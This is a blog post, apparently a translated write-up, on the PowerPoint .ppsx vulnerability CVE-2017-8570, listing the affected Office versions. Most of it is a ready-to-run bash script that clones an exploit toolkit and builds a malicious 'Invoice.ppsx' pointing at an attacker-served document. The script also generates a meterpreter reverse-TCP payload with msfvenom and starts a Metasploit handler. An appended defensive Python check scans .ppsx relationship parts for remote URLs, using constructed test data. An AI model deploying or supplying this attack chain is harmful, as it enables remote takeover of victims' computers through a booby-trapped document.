CVE-2017-8570 is a vulnerability in PowerPoint slideshow documents; it is simple to exploit and its impact is severe. An attacker only needs to send a generated malicious .ppsx document (.ppsx is the slideshow save format used by Office 2007 and later) to a user; once the user opens it and starts the slideshow, the machine is compromised.
Affected versions
Affected range:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Automation script
# Attacker-side parameters: listener address/port and working directory
attack_ip="192.168.1.212"
LPORT="6666"
DIR="/var/cve2017"

# Start from an empty working directory
if [ -d "${DIR}" ]; then
  rm -rf "${DIR}"
  mkdir "${DIR}"
else
  mkdir "${DIR}"
fi
cd "${DIR}"

# Fetch the Office8570 toolkit and put its template where the script expects it
git clone https://github.com/tezukanice/Office8570.git
cd Office8570
mkdir template
mv template.ppsx template/template.ppsx

# Generate the .ppsx that references the remote document served by the attacker host
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u "http://${attack_ip}/logo.doc"

# Build the reverse-TCP payload the served document will drop
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${attack_ip} LPORT=${LPORT} -f exe > "${DIR}/shell.exe"

# Serve logo.doc and shell.exe from the attacker host in a separate terminal
gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe"

# Write a Metasploit resource file for the handler and start it
service postgresql start
if [ -f "exp.rc" ]; then
  rm "exp.rc"
fi
echo "use exploit/multi/handler" >> exp.rc
echo "set LHOST ${attack_ip}" >> exp.rc
echo "set LPORT ${LPORT}" >> exp.rc
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> exp.rc
echo "exploit" >> exp.rc
gnome-terminal -e "msfconsole -r exp.rc"
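The generated deck above makes PowerPoint fetch a document from the attacker's web server. The following defensive check is added here as an example and is not part of the original post or of the Office8570 toolkit: it opens a .ppsx as the OOXML ZIP package it is and lists every relationship entry whose TargetMode is External and whose target is an http(s) URL. It assumes the remote reference lives in a .rels part; the minimal package, relationship XML and IP address are constructed test data.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# OOXML package relationships namespace, used by every *.rels part.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
URL_RE = re.compile(r"(?i)^https?://")


def find_external_targets(package_bytes):
    """Return (rels_part, target) for each relationship that points outside
    the package at an http(s) URL. A non-ZIP input raises zipfile.BadZipFile;
    treat that as a finding too, since a real .ppsx is always a ZIP."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and URL_RE.match(target):
                    hits.append((name, target))
    return hits


def build_sample(slide_rels_xml):
    """Assemble a minimal ppsx-like package in memory (constructed test data;
    a real deck carries many more parts)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("ppt/slides/slide1.xml", "<sld/>")
        pkg.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


_HEAD = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
         '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>')
CLEAN_RELS = _HEAD + "</Relationships>"
# Constructed: an OLE object relationship whose target is a remote document.
SUSPICIOUS_RELS = (_HEAD +
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://203.0.113.5/logo.doc" TargetMode="External"/>'
    "</Relationships>")

if __name__ == "__main__":
    for label, rels in (("clean", CLEAN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, find_external_targets(build_sample(rels)))
```

Run it against a real file with `find_external_targets(open(path, "rb").read())`; an empty list means no remote relationship was found, not that the file is safe.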
Reference links
Original article by Y4er. Reproduction without authorization is prohibited; to reproduce it, contact the author: Y4er